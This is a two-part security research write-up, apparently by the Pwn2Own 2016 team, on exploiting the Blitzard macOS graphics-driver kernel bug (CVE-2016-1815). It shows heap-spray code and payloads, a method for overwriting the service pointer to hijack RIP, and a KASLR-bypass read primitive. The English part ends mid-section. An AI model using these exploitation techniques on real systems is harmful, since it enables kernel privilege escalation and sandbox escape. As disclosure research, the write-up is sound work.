Pwning the Whole Kernel with One Rectangle, Part 1: The Dance of the Zones


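Pwn an entire kernel with a single rectangle? It sounds unbelievable, yet it really happened this March on the Pwn2Own stage in Vancouver. This series shares how we discovered and exploited Blitzard (CVE-2016-1815), the bug we used for our sandbox escape. The exploit took three steps. This post first covers the second and third, "the dance of kalloc.48" and "kalloc.8192: a heavy sword needs no edge". The final post goes back to the source and explains the root cause of the vulnerability.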

Take away

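We exploited an out-of-bounds (OOB) access on a vector. With a carefully prepared heap layout we turned it into a primitive that writes to an arbitrary address but with restricted values, then used that primitive several times to build an infoleak that bypasses KASLR and finally to control RIP.

The IGVector::add function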

char __fastcall IGVector<rect_pair_t>::add(IGVector *this, rect_pair_t *a2)
{
  v3 =;
  if ( this->currentSize != this->capacity )
    goto LABEL_4;
  LOBYTE(v4) = IGVector<rect_pair_t>::grow(this, 2 * v3);
  if ( v4 )
  {
LABEL_4:
    this->currentSize += 1;
    v5 =;
    *(this->storage +  32 * this->currentSize + 24) = a2->field_18; //rect2.len height 
    *(this->storage +  32 * this->currentSize + 16) = a2->field_10; //rect2.y x
    *(this->storage +  32 * this->currentSize + 8) = a2->field_8; //rect1.len height
    *(this->storage +  32 * this->currentSize) = a2->field_0;  //rect1.y x
  }
  return v4;
}

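IGVector is a generic template class used heavily in Apple's graphics drivers. It begins with a currentSize field, immediately followed by a capacity field that records the vector's current maximum capacity. After that comes the storage pointer, the heap address of the vector's storage area. rect_pair_t is a pair of rectangles, each of which uniquely describes a drawing region on screen. The fields of a rectangle are: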

  • int16 x
  • int16 y
  • int16 w
  • int16 h

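x and y are the coordinates of a corner of the rectangle, while w and h are its width and height. Together these four values uniquely determine a rectangle in the coordinate system. The rectangles start out as integers, but after a series of scaling and splitting operations they become IEEE 754 floating-point numbers. The floating-point arithmetic made reversing the driver harder, because IDA's F5 decompiler plugin can barely recognize and organize SSE floating-point instructions. It also limits what our OOB write can control.

When the OOB occurs, memory is laid out as in the following figure:

OOB memory snapshot

The IGVector::add call operates on a 48-byte IGVector that lies partly out of bounds. The size field is pinned to 0xdeadbeefdeadbeef: kalloc.48 elements are smaller than a cache line, so the zone allocator always poisons them after free. Fortunately, capacity and storage are both fields we can find ways to control. If the following conditions hold, we get an arbitrary-address write spanning the entire address space.

condition 1, condition 2, condition 3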

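This is still not a write-anything primitive, though. As noted above, the rectangle fields are signed int16 values, in the range [-0x8000, 0x7fff]. By the time the function that triggers the OOB is called, they have been converted to IEEE 754 floats, so the primitive can only write pairs of consecutive 4-byte values in the range [0x3…, 0x4…., 0xc…., 0xd…., 0xbf800000] (0xbf800000 is the float representation of -1), four times in a row, overwriting 32 bytes of memory in total.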

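That does not look like good news. We first need to make this awkward write stable, and then show how to use it to complete the exploit.

Controlling the kalloc.48 zone

As the figure above shows, we must precisely control the memory contents at the point where the overflow happens, otherwise a bad access crashes the kernel. Unfortunately kalloc.48 is a fairly busy zone in the kernel, and IOMachPort is its most active occupant. We obviously cannot control the contents of an IOMachPort, so we have to keep it from interfering.

Historically, the usual heap-grooming tools have been io_open_service_extended and ool_msg. Each has its trade-offs:

  • ool_msg has few side effects on the heap, but its first 0x18 bytes are not controllable, while this bug needs precise control of the 8 bytes at offset 0x8 from the head
  • io_open_service_extended causes heavy side effects in kalloc.48, because every spray allocates a new IOMachPort

Here we found and used a new heap-spray method: IOCatalogueSendData, shown in the code below. A single masterPort is enough to spray, with few heap side effects: very energy-saving and eco-friendly 🙂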

IOCatalogueSendData(
        mach_port_t     _masterPort,
        uint32_t                flag,
        const char             *buffer,
        uint32_t                size )
{
//...

    kr = io_catalog_send_data( masterPort, flag,
                            (char *) buffer, size, &result );
//...
    if ((masterPort != MACH_PORT_NULL) && (masterPort != _masterPort))
    mach_port_deallocate(mach_task_self(), masterPort);
//...
}

/* Routine io_catalog_send_data */
kern_return_t is_io_catalog_send_data(
        mach_port_t     master_port,
        uint32_t                flag,
        io_buf_ptr_t        inData,
        mach_msg_type_number_t  inDataCount,
        kern_return_t *     result)
{
//...
    if (inData) {
//...
        kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t)inData);
        data = CAST_DOWN(vm_offset_t, map_data);
     // must return success after vm_map_copyout() succeeds
        if( inDataCount ) {
            obj = (OSObject *)OSUnserializeXML((const char *)data, inDataCount);
//...
    switch ( flag ) {
//...

        case kIOCatalogAddDrivers: 
        case kIOCatalogAddDriversNoMatch: {
//...
                array = OSDynamicCast(OSArray, obj);
                if ( array ) {
                    if ( !gIOCatalogue->addDrivers( array , 
                                          flag == kIOCatalogAddDrivers) ) {
//...
            }
            break;
//...
}

bool IOCatalogue::addDrivers(
    OSArray * drivers,
    bool doNubMatching)
{
   //...
    while ( (object = iter->getNextObject()) ) {

        // xxx Deleted OSBundleModuleDemand check; will handle in other ways for SL

        OSDictionary * personality = OSDynamicCast(OSDictionary, object);
//...
        // Add driver personality to catalogue.
    OSArray * array = arrayForPersonality(personality);
    if (!array) addPersonality(personality);
    else
    {       
        count = array->getCount();
        while (count--) {
        OSDictionary * driver;

        // Be sure not to double up on personalities.
        driver = (OSDictionary *)array->getObject(count);
//...
        if (personality->isEqualTo(driver)) {
            break;
        }
        }
        if (count >= 0) {
        // its a dup
        continue;
        }
        result = array->setObject(personality);
//...
    set->setObject(personality);        
    }
//...
}

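The addDrivers function accepts an OSArray that meets the following conditions:

  • the OSArray contains an OSDict
  • the OSDict contains the key IOProviderClass
  • the OSDict must not duplicate an OSDict that already exists in the Catalogue

We can prepare the layout payload in the XML format below and send it with IOCatalogueSendData(masterPort, 2, buf, 4096), as many times as we like 🙂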

<array>
    <dict>
        <key>IOProviderClass</key>
        <string>ZZZZ</string>
        <key>ZZZZ</key>
        <array>
            <string>AAAAAAAAAAAAAAAAAAAAAA</string>
            <string>AAAAAAAAAAAAAAAAAAAAAB</string>
            ...
            <string>ZZZZZZZZZZZZZZZZZZZZZZ</string>
        </array>
    </dict>
</array>

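With this method in hand, we have our steps for playing in kalloc.48:

  • Spray many groups of 1 vm_map_copy plus 50 IOCatalogueSendData allocations (content fully under our control), all of size 0x30.

Step1

  • Free the ool_msg allocations in the 1/3 to 2/3 portion, punching holes in the heap.

Step2

  • Trigger the vulnerability so that the vulnerable allocation falls into one of the holes.

Step3

Because we dug enough holes, the heap layout tends to stabilize and matches our expectation with very high probability. This gives us a stable, repeatable arbitrary-address write and completes the first of the three steps.

And after that?

Controlling RIP with a float

Once we have a stable write, how do we control RIP? A naive idea is to overwrite a userclient's vtable pointer directly. Because of the bug's restricted write range, that does not work, as the figure shows:

wrong-overwrite

Note that addresses beginning with 0xbf are invalid in the kernel.

Thankfully the x86 mov instruction does not require strict 8-byte alignment, so we can do a write aligned to 4 bytes instead, as shown here:

four-overwrite

That looks more promising, but it is not that simple. Among the vast number of userclients, only RootDomainUserClient has a vtable pointer whose high bytes are 0xffffff80. The vtable pointers of all other userclients have high bytes 0xffffff7f, and given how kASLR works, kernel heap addresses will essentially never occupy that region. So is overwriting RootDomainUserClient feasible?

Why is the spray so slow?

RootDomainUserClient is small, so we need to spray a large number of them to get a good chance that a userclient lands at a predicted address. In practice, the spray speed dropped quadratically as the number of userclients grew. We looked into the relevant code, shown below:

bt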

bool IORegistryEntry::attachToParent( IORegistryEntry * parent,
                                const IORegistryPlane * plane )
{
    OSArray *  links;
    bool   ret;
    bool   needParent;
//...
    ret = makeLink( parent, kParentSetIndex, plane );

    if( (links = parent->getChildSetReference( plane )))
        needParent = (false == arrayMember( links, this ));
    else
        needParent = true;

//...
    if( needParent)
        ret &= parent->attachToChild( this, plane );

    return( ret );

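We can see that arrayMember performs a linear search over the clients already attached, and as anyone who went to school will recognize, that makes the whole spray O(N^2).

The code that follows makes it even worse. Before a userclient is opened it must first attach to its parent, which calls parent->attachToChild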

bool IORegistryEntry::attachToChild( IORegistryEntry * child,
                                        const IORegistryPlane * plane )
{
    OSArray *  links;
//...

    ret = makeLink( child, kChildSetIndex, plane );

then

bool IORegistryEntry::makeLink( IORegistryEntry * to,
                                unsigned int relation,
                                const IORegistryPlane * plane ) const
{
    OSArray *  links;
    bool   result = false;
//...
        result = arrayMember( links, to );
        if( !result)
            result = links->setObject( to );

    } else {

Here links is an OSArray, and setObject inserts the new userclient into the array's storage, which calls into an expensive function:

unsigned int OSArray::ensureCapacity(unsigned int newCapacity)
{
//...
    newArray = (const OSMetaClassBase **) kalloc_container(newSize);
    if (newArray) {
        oldSize = sizeof(const OSMetaClassBase *) * capacity;

        OSCONTAINER_ACCUMSIZE(((size_t)newSize) - ((size_t)oldSize));

        bcopy(array, newArray, oldSize);
        bzero(&newArray[capacity], newSize - oldSize);
        kfree(array, oldSize);
        array = newArray;

diagram

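The conclusion from this tour is that spraying userclients has O(N^2) time complexity, which forces us to spray with a large userclient. This year's target machine, the MacBook, has a Core M processor with next to no power, and the exploit would run slower than a snail if we stayed hung up on RootDomainUserClient alone.

IGAccelVideoContext to the rescue

We kept searching for a usable userclient under these conditions:

  • it must be possible to open and call it from the sandbox
  • its size must be larger than PAGESIZE, the bigger the better

IGAccelVideoContext, which occupies two pages, is exactly the savior we were looking for. Essentially every IOAcceleratorFamily2 userclient has a service pointer to IntelAccelerator. For IGAccelVideoContext it is at offset 0x528. We can overwrite the low 4 bytes of this heap address to point it at heap content we control, and then trigger a virtual call through it.

heap-overwrite

RIP control

Although there are virtual function calls here, we cannot call a virtual function of service directly, because as mentioned earlier the head of the content laid out by vm_map_copy is not controllable. The context_finish interface makes an indirect virtual call on service->mEventMachine, which is exactly what we need.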

__int64 __fastcall IOAccelContext2::context_finish(IOAccelContext2 *this)
{
  int v1; // eax@1
  unsigned int v2; // ecx@1

  v1 = this->service->mEventMachine->vt->__ZN24IOAccelEventMachineFast219finishEventUnlockedEP12IOAccelEvent(
         this->service->mEventMachine,

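So we change direction and overwrite the service field of any IGAccelVideoContext. Knowing nothing about concrete heap addresses, we can only keep spraying. The steps are:

  • spray 0x50,000 ool_msgs, pushing the heap up to 0xffffff80 bf800000 (address B)
  • free the middle ones and spray IGAccelVideoContext, so that the middle address A, 0xffffff80 62388000, is occupied by one
  • trigger the vulnerability and write at A - 4 + 0x528, turning the service pointer into 0xffffff80 bf800000 (address B)
  • call externalMethod on the sprayed userclients and check for corruption

Why A and B, two addresses that look like magic numbers? As mentioned, we can only write floats in particular ranges. For example, we can turn 0xffffff80 deadbeef into 0xffffff80 3xxxxxxx, 0xffffff80 4xxxxxxx, 0xffffff80 cxxxxxxx, 0xffffff80 dxxxxxxx or 0xffffff80 bf800000. Most of these addresses are either too low (kslide changes on every boot, and a high slide pushes the heap base up to 0xffffff80 4xxxxxxx) or too high (not enough memory, and spraying takes too long). So we chose to write 0xbf800000, and taking half of it gives A.

The following code shows this part: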

mach_msg_size_t size = 0x2000;
mach_port_name_t my_port[0x500];
memset(my_port, 0, 0x500 * sizeof(mach_port_name_t));
char *buf = malloc(size);
memset(buf, 0x41, size);
*(unsigned long *)(buf - 0x18 + 0x1230) = 0xffffff8062388000 - 0xd0 + 2;
*(unsigned long *)(buf - 0x18 + 0x230) = 0xffffff8062388000 - 0xd0 + 2;

for (int i = 0; i < 0x500; i++) {
    *(unsigned int *)buf = i;
    printf("number %x success with %x.\n",i , send_msg(buf, size, &my_port[i]));
}
for (int i = 0x130; i < 0x250; i++)
{
    read_kern_data(my_port[i]);
}
printf("press enter to fill in IOSurface2.\n");
io_service_t serv = open_service("IOAccelerator");
io_connect_t *deviceConn2;
deviceConn2 = malloc(0x12000 * sizeof(io_connect_t));
kern_return_t kernResult;
for (int i =0; i < 0x12000; i ++)
{
    kernResult = IOServiceOpen(serv, mach_task_self(), 0x100, &deviceConn2[i]);
    printf("%x with result %x.\n", i , kernResult);
}

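overwrite-1

This figure makes it clearer.

So is that the end of the story? Far from it.

Head or middle?

Sharp readers may already have a question: the sprayed objects are 0x2000 bytes, so what guarantees that A falls exactly at the head of a sprayed userclient? It could just as well land in the middle.

Quite right. To handle the case where it falls in the middle, we need to overwrite both A - 4 + 0x528 and A - 4 + 0x528 + 0x1000 so that both cases are covered.

Bypassing kASLR

How do we get past kASLR? We now know that address A is covered by an IGAccelVideoContext and address B by the vm_map_copy we sprayed. Since the pointer already points at a fake userclient that we laid out, is there an interface that returns the contents at some address inside a userclient? Searching turned up get_hw_steppings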

__int64 __fastcall IGAccelVideoContext::get_hw_steppings(IGAccelVideoContext *a1, _DWORD *a2)
{
  __int64 service; // rax@1

  service = a1->service;
  *a2 = *(_DWORD *)(service + 0x1140);
  a2[1] = *(_DWORD *)(service + 0x1144);
  a2[2] = *(_DWORD *)(service + 0x1148);
  a2[3] = *(_DWORD *)(service + 0x114C);
  a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);
  return 0LL;
}

Note this line:

a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);

Recall that service+0x1288 is already under our control, so this is a perfect arbitrary-address read primitive. We take the following steps:

  • fill B with vm_map_copy
  • trigger the vulnerability and overwrite the service pointer so that it points to B, that is, to a vm_map_copy filled with 0x4141414141414141 (except at 0x1288, which is set to A-0xD0)
  • call get_hw_steppings and check for 41414141; if that comes back, this userclient is the one we modified
  • a2[4] then returns 1 byte at address A; repeat the steps above to read everything

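The following figure makes this clearer.

infoleak

Head or middle, again

Sharp readers will again realize that B may also fall in the middle of a vm_map_copy, just like A. For B the fix is the same as above: we set both 0x1288 and 0x288 to A - 0xD0. As for A, if the location we read is at offset 0x1000 of a normal IGAccelVideoContext, it is known to hold 0.

middle

That means we can use this property to tell head from tail in at most two attempts, as the figures show.

head tail

This finally gives us an arbitrary-address leak.

Summary

A video of the exploit is available at http://v.qq.com/x/page/f0196p3g7vq.html.

So what exactly is this magical rectangle bug? With an exploit this involved, what does the vulnerability itself look like? Stay tuned for the follow-up posts. If you cannot wait, have a look at our Blackhat USA slides 🙂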

The Journey of a complete OSX privilege escalation with a single vulnerability – Part 1


In previous blog posts Liang talked about the userspace privilege escalation vulnerability we found in WindowServer. In the following articles I will talk about Blitzard, the kernel bug we used at this year's Pwn2Own to escape the Safari renderer sandbox, which lives in the blit operation of the graphics pipeline. From an exploiter's perspective, we took advantage of a vector out-of-bounds access which, under carefully prepared memory conditions, leads to a write-anywhere-but-value-restricted primitive, and used it to achieve both infoleak and RIP control. In this article we introduce the exploitation methods we played with, mainly in kalloc.48 and kalloc.4096.

We first introduce the function in which the overflow occurs, what we can control, and how this affects the rest of the exploitation.

The IGVector add function

char __fastcall IGVector<rect_pair_t>::add(IGVector *this, rect_pair_t *a2)
{
  v3 =;
  if ( this->currentSize != this->capacity )
    goto LABEL_4;
  LOBYTE(v4) = IGVector<rect_pair_t>::grow(this, 2 * v3);
  if ( v4 )
  {
LABEL_4:
    this->currentSize += 1;
    v5 =;
    *(this->storage +  32 * this->currentSize + 24) = a2->field_18; //rect2.len height 
    *(this->storage +  32 * this->currentSize + 16) = a2->field_10; //rect2.y x
    *(this->storage +  32 * this->currentSize + 8) = a2->field_8; //rect1.len height
    *(this->storage +  32 * this->currentSize) = a2->field_0;  //rect1.y x
  }
  return v4;
}

IGVector is a generic template collection class used frequently in Apple's graphics drivers. At its head lies the currentSize field. Right after it comes capacity, the current capacity of the vector. The storage pointer follows the capacity field and records the actual heap location of the elements. rect_pair_t holds a pair of rectangles, each of which corresponds to a drawing region on screen. The fields of a rect are listed as follows:

  • int16 x
  • int16 y
  • int16 w
  • int16 h

x and y are the coordinates of the rect's corner on screen, while w and h are the width and height of the rectangle. The four fields uniquely locate a rectangle on screen. The initial arguments of the rectangle are passed in as integers, but after a series of multiplications and divisions they become IEEE 754 floating-point numbers in memory, which makes Hex-Rays suffer a lot because it can hardly deal with SSE floating-point instructions 🙁

When the overflow occurs, the memory layout is shown as the following figure.

igvec-48

As the figure shows, the add function is called on a partially out-of-bounds 48-byte block. The size field is fixed to 0xdeadbeefdeadbeef: a kalloc.48 element is smaller than the cache-line size, so it is always poisoned after being freed. The good news is that both the capacity field and the storage pointer are under our control. This means we have a write-anywhere primitive covering the whole address space, provided we carefully prepare content satisfying the following equations. Let

definition

then

addr-calc

and also

non-equal
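Taking the decompiled add listing above at face value, the address arithmetic behind these conditions can be sketched in C. This is a minimal sketch under stated assumptions, not the authors' code: the function names are illustrative, the index is assumed to be the poisoned currentSize plus one (as the listing suggests), and the element stride of 32 bytes is read off the listing.

```c
#include <stdint.h>

/* Value the zone allocator leaves in the freed element, per the article. */
#define POISONED_SIZE 0xdeadbeefdeadbeefULL
/* Element stride, read off the decompiled listing (32 * currentSize). */
#define ELEM_SIZE 32ULL

/* Address of the first byte add() writes, assuming the listing is accurate:
 * currentSize is incremented first and then used as the index. Unsigned
 * arithmetic wraps modulo 2^64, like the pointer arithmetic it models. */
uint64_t write_target(uint64_t storage, uint64_t current_size)
{
    return storage + ELEM_SIZE * (current_size + 1);
}

/* Inverse: the storage value that makes add() write at `target`. */
uint64_t storage_for_target(uint64_t target, uint64_t current_size)
{
    return target - ELEM_SIZE * (current_size + 1);
}

/* grow() is skipped only while currentSize differs from capacity. */
int skips_grow(uint64_t current_size, uint64_t capacity)
{
    return current_size != capacity;
}
```

For example, `storage_for_target(0xffffff8062388524ULL, POISONED_SIZE)` yields the storage value to spray so that the write lands at that address, as long as the sprayed capacity differs from the poisoned size.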

So we have a write-anywhere primitive, but not a write-anything one. The rectangles initially have their fields in signed int16 format, falling in the range [-0x8000, 0x7fff]. By the time the function is called they have already been converted to their IEEE 754 representation in memory, which means we can only use the primitive to write two consecutive 4-byte values in the range [0x3…, 0x4…., 0xc…, 0xd…, 0xbf800000] (0xbf800000 is the float representation of -1), four times, corrupting 32 bytes of memory.
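To see where these leading hex digits come from, the bit pattern of a single-precision float can be inspected directly. The sketch below is illustrative only (the helper names are not from the driver) and assumes the platform's float is IEEE 754 binary32, which holds on the x86 machines discussed here.

```c
#include <stdint.h>
#include <string.h>

/* Return the raw IEEE 754 single-precision bit pattern of f. */
uint32_t float_bits(float f)
{
    uint32_t bits;
    memcpy(&bits, &f, sizeof bits);   /* well-defined type punning */
    return bits;
}

/* Most significant hex digit of the pattern: sign bit plus the
 * top three exponent bits. */
unsigned top_nibble(float f)
{
    return float_bits(f) >> 28;
}
```

With these helpers, -1.0f encodes as 0xbf800000, positive values of magnitude 2 or more start with 0x4, and their negatives start with 0xc, which is why the written dwords cannot take the 0xffffff80 form of a kernel pointer's upper half.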

Control the kalloc.48 zone

We need to place precisely controlled values right after the overflowed vector, otherwise the kernel will crash on a bad access. Unfortunately kalloc.48 is a zone used frequently in the kernel, with IOMachPort the most commonly seen object, and we must keep it out of the way. Previous work mainly uses io_open_service_extended and ool_msg to prepare the kernel heap, but both are problematic in our situation:

  • ool_msg has a small heap side effect, but its first 0x18 bytes are not controllable, while we need precise control of 8 bytes at offset 0x8 from the head
  • io_open_service_extended has a massive side effect in the kalloc.48 zone, producing an IOMachPort for every spraying connection opened
  • each io_open_service_extended call can pass at most 37 items into the kernel to occupy space, a limit set by the maximum number of properties an IOServiceConnection can hold

Thus we present a new spray technique: IOCatalogueSendData, shown in the following code snippet. Only one master_port is needed for continuous spraying, really energy-saving and earth friendly 🙂

IOCatalogueSendData(
        mach_port_t     _masterPort,
        uint32_t                flag,
        const char             *buffer,
        uint32_t                size )
{
//...

    kr = io_catalog_send_data( masterPort, flag,
                            (char *) buffer, size, &result );
//...
    if ((masterPort != MACH_PORT_NULL) && (masterPort != _masterPort))
    mach_port_deallocate(mach_task_self(), masterPort);
//...
}

/* Routine io_catalog_send_data */
kern_return_t is_io_catalog_send_data(
        mach_port_t     master_port,
        uint32_t                flag,
        io_buf_ptr_t        inData,
        mach_msg_type_number_t  inDataCount,
        kern_return_t *     result)
{
//...
    if (inData) {
//...
        kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t)inData);
        data = CAST_DOWN(vm_offset_t, map_data);
     // must return success after vm_map_copyout() succeeds
        if( inDataCount ) {
            obj = (OSObject *)OSUnserializeXML((const char *)data, inDataCount);
//...
    switch ( flag ) {
//...

        case kIOCatalogAddDrivers: 
        case kIOCatalogAddDriversNoMatch: {
//...
                array = OSDynamicCast(OSArray, obj);
                if ( array ) {
                    if ( !gIOCatalogue->addDrivers( array , 
                                          flag == kIOCatalogAddDrivers) ) {
//...
            }
            break;
//...
}

bool IOCatalogue::addDrivers(
    OSArray * drivers,
    bool doNubMatching)
{
   //...
    while ( (object = iter->getNextObject()) ) {

        // xxx Deleted OSBundleModuleDemand check; will handle in other ways for SL

        OSDictionary * personality = OSDynamicCast(OSDictionary, object);
//...
        // Add driver personality to catalogue.
    OSArray * array = arrayForPersonality(personality);
    if (!array) addPersonality(personality);
    else
    {       
        count = array->getCount();
        while (count--) {
        OSDictionary * driver;

        // Be sure not to double up on personalities.
        driver = (OSDictionary *)array->getObject(count);
//...
        if (personality->isEqualTo(driver)) {
            break;
        }
        }
        if (count >= 0) {
        // its a dup
        continue;
        }
        result = array->setObject(personality);
//...
    set->setObject(personality);        
    }
//...
}

The addDrivers function accepts an OSArray that meets the following easy-to-satisfy conditions:

  • the OSArray contains an OSDict
  • the OSDict has the key IOProviderClass
  • the OSDict must not be exactly the same as any OSDict that already exists in the Catalogue

We can put our sprayed content in the array part, as the following sample XML shows, and change one character per spray to satisfy the third condition. OSString accepts all bytes except the null byte, which can be avoided. The spray proceeds by calling IOCatalogueSendData(masterPort, 2, buf, 4096) as many times as we wish.

<array>
    <dict>
        <key>IOProviderClass</key>
        <string>ZZZZ</string>
        <key>ZZZZ</key>
        <array>
            <string>AAAAAAAAAAAAAAAAAAAAAA</string>
            <string>AAAAAAAAAAAAAAAAAAAAAB</string>
            ...
            <string>ZZZZZZZZZZZZZZZZZZZZZZ</string>
        </array>
    </dict>
</array>
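A payload of this shape can be generated per spray so that no two dictionaries are identical. The following is a rough sketch, not the exploit's actual generator: build_spray_xml and its parameters are hypothetical, and the uniqueness tag (four letters appended to each string) is just one way to satisfy the no-duplicate condition. The resulting buffer is what would be handed to IOCatalogueSendData as described above.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: write one spray payload into out (capacity cap).
 * Each of the `count` strings is `len` characters: (len - 4) copies of
 * `fill` followed by a 4-letter tag derived from spray_id and the string
 * index, so payloads differ between sprays (unique while the tag value
 * stays below 26^4). `fill` must not be an XML special character.
 * Returns the payload length, or 0 if the arguments do not fit. */
size_t build_spray_xml(char *out, size_t cap, unsigned spray_id,
                       unsigned count, unsigned len, char fill)
{
    static const char head[] =
        "<array><dict><key>IOProviderClass</key>"
        "<string>ZZZZ</string><key>ZZZZ</key><array>";
    static const char tail[] = "</array></dict></array>";
    size_t need = strlen(head) + strlen(tail)
                + (size_t)count * (len + strlen("<string></string>")) + 1;
    char *p = out;

    if (len < 4 || need > cap)
        return 0;

    p += sprintf(p, "%s", head);
    for (unsigned i = 0; i < count; i++) {
        unsigned tag = spray_id * count + i;
        p += sprintf(p, "<string>");
        memset(p, fill, len - 4);
        p += len - 4;
        for (int d = 0; d < 4; d++) {       /* base-26 tag, letters only */
            *p++ = (char)('A' + tag % 26);
            tag /= 26;
        }
        p += sprintf(p, "</string>");
    }
    p += sprintf(p, "%s", tail);
    return (size_t)(p - out);
}
```

Calling it with increasing spray_id values produces distinct buffers that each fit in the 4096 bytes used in the article's call.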

So we have the following steps to play in kalloc.48 and achieve a stable write-anywhere:

  • spray many groups of 1 ool_msg and 50 IOCatalogueSendData allocations (the content of which is totally controllable), all of size 0x30, pushing allocations into a contiguous region.

kalloc-48-1

  • free ool_msg at 1/3 to 2/3 part, leaving holes in allocation as shown below.

kalloc-48-2

  • trigger vulnerable function, vulnerable allocation will fall in hole we previously left, as shown below.

kalloc-48-3

With a nearly 100% chance the heap will be laid out as in the previous figure, which is exactly what we expect. Spraying 50 or more controllable 0x30-sized blocks in one roll reduces the chance that some irrelevant 0x30-sized object produced by other kernel activity, such as an IOMachPort, accidentally lands right after the free block our vector occupies. It also lets us perform a double-write or triple-write, which turns out to be crucial in the following exploitation steps.

Write a float to control RIP

With the write itself stable, we move on to turning it into actual RIP control and/or an infoleak. The first idea that comes to mind is to overwrite the vtable pointer at the head of some userclient. At first glance this vulnerability is not a very good write primitive for that, because we will certainly corrupt the poor userclient, as shown in the following figure:

bad-overwrite

In the OS X kernel, an address whose high byte is 0xbf is almost impossible (or you can just say impossible) to occupy or fill with prepared content. And due to the nature of Blitzard, we cannot make the value we write start with 0xffffff80 so that it points to a heap location we control.

But thanks to Intel CPUs, we can make a qword write at an unaligned location, i.e. at a 4-byte offset.

align-write

This looks reasonable, but we found the stability unpromising. In the huge family of userclients, it seems only RootDomainUserClient has a vtable pointer whose high bytes are 0xffffff80. Other userclients all have vtable pointers whose fourth byte is 0x7f. Addresses starting at 0xffffff7f00000000 are usually occupied by non-writable sections, so we cannot manipulate memory there to gain any degree of control, whereas addresses with high bytes 0xffffff80 can contain heap regions.

Decreasing spray speed? Why?

But RootDomainUserClient is a small userclient, and we need to spray lots of them to get a good chance that one falls at the beginning of a particular page. We quickly found that the spray speed drops noticeably as the number of userclients increases. After some investigation we found the root cause; see the following code snippet.

backtrace

bool IORegistryEntry::attachToParent( IORegistryEntry * parent,
                                const IORegistryPlane * plane )
{
    OSArray *  links;
    bool   ret;
    bool   needParent;
//...
    ret = makeLink( parent, kParentSetIndex, plane );

    if( (links = parent->getChildSetReference( plane )))
        needParent = (false == arrayMember( links, this ));
    else
        needParent = true;

//...
    if( needParent)
        ret &= parent->attachToChild( this, plane );

    return( ret );

Here arrayMember performs a linear search over the clients already attached, which already implies O(N^2) time complexity for the whole spray.

Can things get worse? Let's go further. When userclients are opened, they need to be attached to their parent. This in turn calls parent->attachToChild

bool IORegistryEntry::attachToChild( IORegistryEntry * child,
                                        const IORegistryPlane * plane )
{
    OSArray *  links;
//...

    ret = makeLink( child, kChildSetIndex, plane );

then

bool IORegistryEntry::makeLink( IORegistryEntry * to,
                                unsigned int relation,
                                const IORegistryPlane * plane ) const
{
    OSArray *  links;
    bool   result = false;
//...
        result = arrayMember( links, to );
        if( !result)
            result = links->setObject( to );

    } else {

Here links is an OSArray, and setObject inserts the new userclient into the array storage, which calls into this expensive function

unsigned int OSArray::ensureCapacity(unsigned int newCapacity)
{
//...
    newArray = (const OSMetaClassBase **) kalloc_container(newSize);
    if (newArray) {
        oldSize = sizeof(const OSMetaClassBase *) * capacity;

        OSCONTAINER_ACCUMSIZE(((size_t)newSize) - ((size_t)oldSize));

        bcopy(array, newArray, oldSize);
        bzero(&newArray[capacity], newSize - oldSize);
        kfree(array, oldSize);
        array = newArray;

spray-time

In conclusion, the spraying time grows as N^2 in the number of userclients opened per service. This may not be a big problem for powerful MacBook Pros, but we found the Core M processor in the new MacBook (unfortunately the machine we needed to exploit in the Pwn2Own competition) to be as slow as grandma, which forced us to find better and faster ways. Fortunately, a new method popped up and solved the RIP control and infoleak problems in one shot. That's perfect.
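The quadratic growth is easy to reproduce outside the kernel. The toy model below is a sketch, not XNU code: it stands in for the links array with a plain C array and counts the comparisons made when each newly attached client is first searched for linearly, the way arrayMember is used above. The name simulate_attach is made up for this illustration.

```c
#include <stdint.h>
#include <stdlib.h>

/* Attach n distinct clients one by one; before each insert, scan the
 * existing entries linearly (as a membership check would). Returns the
 * total number of comparisons, or 0 if allocation fails. */
uint64_t simulate_attach(size_t n)
{
    size_t *links = malloc((n ? n : 1) * sizeof *links);
    uint64_t comparisons = 0;
    size_t count = 0;

    if (!links)
        return 0;
    for (size_t client = 0; client < n; client++) {
        int found = 0;
        for (size_t i = 0; i < count; i++) {
            comparisons++;
            if (links[i] == client) {
                found = 1;
                break;
            }
        }
        if (!found)
            links[count++] = client;   /* new client: scan ran to the end */
    }
    free(links);
    return comparisons;
}
```

Attaching N clients costs N(N-1)/2 comparisons in this model, so doubling the spray size roughly quadruples the work, before even counting the repeated scans and array reallocations visible in the kernel snippets.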

IGAccelVideoContext comes to rescue

As we searched for helpful userclients, the following criteria had to be met:

  • it must be reachable from the sandbox
  • its size must be larger than PAGE_SIZE, and bigger is better (faster spray speed)

We have to admit that directly overwriting vtable pointers is not a good fit for our vulnerability. Can we overwrite some pointer field of a userclient instead? The answer is yes. IGAccelVideoContext is a perfect candidate, with size 0x2000. Nearly all IOAcceleratorFamily2 userclients have an associated service pointer, which points to the mother IntelAccelerator. As the following figure shows, this pointer sits at offset 0x528. It is a heap address, which means we can use the so-called slide-writing mentioned previously (the unaligned write) to overwrite only its lower 4 bytes and make it point to heap memory we control.

service-ptr
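The effect of shifting the write by 4 bytes can be modeled on a plain byte buffer. This is a minimal sketch with made-up helper names: it stores the two 32-bit float patterns of one 8-byte chunk in little-endian order, as an x86 store would, and compares an aligned write at the pointer with one that starts 4 bytes earlier. The 0x528 offset is the one given in the article.

```c
#include <stddef.h>
#include <stdint.h>

#define SERVICE_OFFSET 0x528   /* offset of the service pointer, per the article */

/* Little-endian stores and loads, independent of the host byte order. */
void store_le32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        p[i] = (uint8_t)(v >> (8 * i));
}

void store_le64(uint8_t *p, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        p[i] = (uint8_t)(v >> (8 * i));
}

uint64_t load_le64(const uint8_t *p)
{
    uint64_t v = 0;
    for (int i = 0; i < 8; i++)
        v |= (uint64_t)p[i] << (8 * i);
    return v;
}

/* Model one 8-byte chunk of the restricted write: two adjacent
 * 32-bit float patterns stored at obj + off. */
void write_float_pair(uint8_t *obj, size_t off, uint32_t first, uint32_t second)
{
    store_le32(obj + off, first);
    store_le32(obj + off + 4, second);
}
```

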